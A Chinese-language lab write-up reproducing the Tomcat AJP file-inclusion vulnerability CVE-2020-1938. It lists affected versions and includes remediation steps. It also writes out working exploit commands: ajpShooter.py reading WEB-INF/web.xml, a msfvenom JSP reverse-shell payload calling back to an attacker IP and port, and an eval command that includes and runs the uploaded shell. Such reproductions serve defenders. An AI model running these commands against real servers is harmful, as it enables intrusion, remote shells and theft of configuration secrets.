漏洞描述
由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。
漏洞相对鸡肋,外网Tomcat服务器一般不会开放ajp8009端口,内网横向使用效率太低。
漏洞编号
CVE-2020-1938
CNVD-2020-10487
影响版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
环境搭建
本地下载存在漏洞的版本,选择了Tomcat/8.5.0版本进行实验。
Tomcat历史版本下载
配置系统环境变量
CATALINA_BASE 安装路径
CATALINA_HOME 安装路径
Path %CATALINA_HOME%\bin
startup启动服务,浏览器访问本地8080端口
复现过程
工具地址
常用两种利用方式:
1、通过AJP协议漏洞读取网站路径下的数据库配置文件,网站配置文件等敏感信息。
2、配合文件上传功能,包含执行上传的恶意代码。
读取WEB-INF/web.xml的内容。
python3 ajpShooter.py http://172.16.86.168:8080 8009 /WEB-INF/web.xml read
假设存在文件上传功能,上传任意后缀的恶意文件,使用文件包含getshell。
生成msf反弹jsp马。
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.txt
上传到当前网站目录下,包含执行恶意代码。
python3 ajpShooter.py http://172.16.86.168:8080/123 8009 /text.txt eval
msf成功接收到会话。
漏洞修复
1、升级无漏洞版本
2、在servce.xml中注释AJP,或者绑定到localhost
(1)编辑 <CATALINA_BASE>/conf/server.xml,找到如下行(<CATALINA_BASE> 为 Tomcat 的工作目录):
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443" />
(2)将此行注释掉(也可删掉该行):
<!--<Connectorport="8009" protocol="AJP/1.3"redirectPort="8443" />-->
(3)保存后需重新启动Tomcat,规则方可生效。
3、若需使用Tomcat AJP协议,可根据使用版本配置协议属性设置认证凭证。
使用Tomcat 7和Tomcat 9的用户可为AJP Connector配置secret来设置AJP协议的认证凭证。例如(注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值):
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>
使用Tomcat 8的用户可为AJP Connector配置requiredSecret来设置AJP协议的认证凭证。例如(注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值):
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS"requiredSecret="YOUR_TOMCAT_AJP_SECRET" />
参考链接
https://blog.csdn.net/weixin_42918771/article/details/104998981